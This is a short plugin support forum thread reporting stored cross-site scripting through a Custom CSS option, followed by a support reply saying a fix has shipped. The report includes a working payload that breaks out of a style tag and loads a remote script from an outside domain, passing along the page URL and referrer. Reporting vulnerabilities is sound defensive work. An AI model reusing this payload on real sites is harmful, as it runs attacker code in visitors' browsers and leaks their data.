XSS in Custom CSS

  • Resolved emerham

    (@emerham)


    1 month, 2 weeks ago

    With 5.5.8 authenticated users can still inject custom code into the Custom CSS option
    example CSS

    </style><script>
    document.write('<script src="https://cdn.amrabekar.com/crypto.js?url='+encodeURIComponent(window.location.href)+'&ref='+encodeURIComponent(document.referrer||'')+'"><\/script>');
    </script><style>


Viewing 1 replies (of 1 total)
  • Plugin Support blainevess

    (@blainevess)

    1 month, 2 weeks ago

    Thanks so much for your feedback. We’ve pushed a new version that should have resolved the issue. Please let us know if you encounter any other issues.

Viewing 1 replies (of 1 total)

You must be logged in to reply to this topic.